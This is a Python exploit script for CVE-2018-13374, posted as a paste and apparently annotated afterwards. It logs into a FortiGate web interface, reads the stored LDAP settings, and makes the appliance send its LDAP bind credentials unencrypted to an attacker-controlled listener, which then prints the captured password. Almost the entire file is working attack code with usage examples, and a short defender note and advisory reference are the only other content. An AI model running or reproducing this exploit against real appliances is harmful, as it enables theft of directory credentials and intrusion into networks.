
Untitled

a guest
Mar 22nd, 2019
  1. #/usr/bin/python3
  2.  
  3. """
  4. CVE-2018-13374
  5. Publicado por Julio Ureña (PlainText)
  6. Twitter: @JulioUrena
  7. Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
  8. Referencia: https://fortiguard.com/psirt/FG-IR-18-157
  9.  
  10. Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP
  11. Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080
  12. """
  13.  
  14. from threading import Thread
  15. from time import sleep
  16. import json, requests, socket, sys, re, click
  17.  
# Silence urllib3's warning output. Every request in this file is sent with
# verify=False, so the appliance certificate is never validated and the
# login secret travels over a TLS channel whose peer is not authenticated.
requests.packages.urllib3.disable_warnings()

# Module-wide session: the cookies set by the /logincheck POST are kept here
# and reused by the later requests.
s = requests.Session()
  23.  
def AccessFortiGate(fortigate_url, username, password, proxy_addr):
    """Log in to the FortiGate web UI and report whether a cookie was set.

    Posts the credentials to ``<fortigate_url>/logincheck`` through the
    module-level session ``s``, which keeps whatever cookies come back.

    Args:
        fortigate_url: Base URL of the appliance.
        username: Account name sent in the ``username`` form field.
        password: Secret sent in the ``secretkey`` form field.
        proxy_addr: ``proxies`` mapping handed to requests.

    Returns:
        True when the session holds at least one cookie after the POST,
        False otherwise.
    """
    form = {"ajax": 1, "username": username, "secretkey": password}

    # verify=False: the server certificate is not checked, so the password
    # is readable by anyone able to intercept the connection.
    s.post(
        fortigate_url + '/logincheck',
        data=form,
        proxies=proxy_addr,
        verify=False,
    )

    # NOTE(review): any cookie counts as success; the response status and
    # body are never inspected.
    return bool(s.cookies)
  37.  
  38.  
def TriggerVuln(fortigate_url, ip, proxy_addr):
    """Replay the stored LDAP settings with the server replaced by ``ip``.

    Reads the first LDAP server entry from ``/p/user/ldap/json/``, starts
    ``GetCreds`` on ``(ip, port)`` in a thread, then calls ``/api/ldap`` with
    the same entry but ``server`` set to ``ip`` and ``secure`` set to 0.
    The script expects the appliance to connect to that listener.

    Defender view: the request is an authenticated GET to ``/api/ldap``
    whose ``server`` value is not the configured LDAP host, followed
    (presumably) by an outbound connection from the appliance to that host
    on the LDAP port. Both are worth alerting on; the vendor fix is tracked
    in FG-IR-18-157, referenced in the file header.

    Args:
        fortigate_url: Base URL of the appliance.
        ip: Address placed in the ``server`` field and bound by ``GetCreds``.
        proxy_addr: ``proxies`` mapping handed to requests.
    """
    print("[+] Triggering Vulnerability")

    # Fetch the LDAP server list with the cookies of the logged-in session.
    listing = s.get(
        fortigate_url + '/p/user/ldap/json/',
        cookies=requests.utils.dict_from_cookiejar(s.cookies),
        proxies=proxy_addr,
        verify=False,
    )

    # Only the first configured LDAP server is used.
    entry = json.loads(listing.text)['source'][0]
    name = entry['name']
    username = entry['username']
    port = int(entry['port'])
    cnid = entry['cnid']
    dn = entry['dn']
    ca = entry['ca-cert']

    listener = Thread(target=GetCreds, args=(ip, port))
    listener.start()
    # Presumably gives the listener time to bind before the request is sent.
    sleep(1)

    print("[+] Username: ", username)

    # Same settings as the stored entry, except for "server" and "secure".
    ldap_request = {
        "info_only": 1,
        "mkey": name,
        "ldap": {
            "server": ip,
            "port": port,
            "cn_id": cnid,
            "username": username,
            "dn": dn,
            "secure": 0,
            "ca": ca,
            "type": 2,
        },
    }

    probe = s.get(
        fortigate_url + '/api/ldap?json=' + str(ldap_request),
        cookies=requests.utils.dict_from_cookiejar(s.cookies),
        proxies=proxy_addr,
        verify=False,
    )
    probe.close()
  67.  
def GetCreds(server, port):
    """Accept one TCP connection on ``(server, port)`` and print what follows the last ``\\x80\\`` marker.

    Reads at most 1024 bytes from the first client, converts the bytes to
    their ``str()`` representation, removes everything up to and including
    the last ``\\x80\\`` in that text, and prints the remainder with its
    first three and last characters cut off.

    NOTE(review): the paste lost its indentation; the nesting below is
    reconstructed from the statement order - confirm against the original.

    Args:
        server: Local address to bind.
        port: Local TCP port to bind.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    # Allow rebinding the address/port, avoiding
    # "OSError: [Errno 98] Address already in use".
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

    server_address = (server, port)
    sock.bind(server_address)

    sock.listen()
    credentials = ''

    while True:
        print('[+] Waiting Fortigate connection ...')
        c, client_address = sock.accept()
        try:
            while True:
                # A single read of up to 1024 bytes; the inner loop always
                # ends at the break below.
                data = c.recv(1024)
                # str() of bytes yields the b'...' repr, in which
                # non-printable bytes show up as \xNN escape text.
                credentials = str(data)
                # \\x80\\ appeared in captures made with 3 different
                # passwords / user names, which is why it is used as the
                # reference point. It separates the username from the
                # password.
                # NOTE(review): the value arrives unencrypted presumably
                # because the request built in TriggerVuln sets "secure"
                # to 0 - confirm.
                ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
                print("[+] Password: ", ldap_pass[3:-1])
                break
        finally:
            # Both the client socket and the listening socket are closed
            # after the first connection.
            c.shutdown(socket.SHUT_RDWR)
            c.close()
            sock.shutdown(socket.SHUT_RDWR)
            sock.close()

        # str(data) is never empty (an empty read gives "b''"), so this
        # leaves the outer loop after the first connection.
        if credentials:
            break
  100.  
def print_help(self, param, value):
    """Click option callback: print the command help, then exit.

    Args:
        self: Object providing ``get_help()`` and ``exit()`` (the click
            context when used as a callback).
        param: Unused.
        value: Flag value; when it is ``False`` nothing happens.
    """
    if value is not False:
        click.echo(self.get_help())
        self.exit()
  106.  
# Command-line entry point: log in, then run TriggerVuln against the same URL.
# NOTE(review): -p takes the account password as a command-line argument, so
# it ends up in shell history and is visible in the process list while the
# script runs.
@click.command()
@click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
@click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
@click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
@click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
@click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
@click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
@click.pass_context
def main(self, fortigate_url, username, password, ip, proxy):
    # No docstring on purpose: click would print it as part of the help text.

    # The three options are declared required=True, so click already rejects
    # a call that omits one; this guard only matters for empty values.
    if not (fortigate_url or username or password):
        print_help(self, None, value=True)
        print("[-] For usage reference use --help")
        exit(0)

    # The same proxy (or None) is used for both URL schemes.
    proxy_addr = dict.fromkeys(('http', 'https'), proxy)

    banner = """[+] CVE-2018-13374
[+] Publicado por Julio Ureña (PlainText)
[+] Blog: https://plaintext.do
[+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
"""
    print(banner)

    target = str(fortigate_url)
    if not AccessFortiGate(target, username, password, proxy_addr):
        print("[-] Unable to login. Please check the credentials and Fortigate URL.")
        # NOTE(review): a failed login still exits with status 0.
        exit(0)

    print("[+] Logged in.")
    sleep(1)
    TriggerVuln(target, ip, proxy_addr)
  142.  
# Run the click command only when the file is executed as a script.
if __name__ == "__main__":
    main()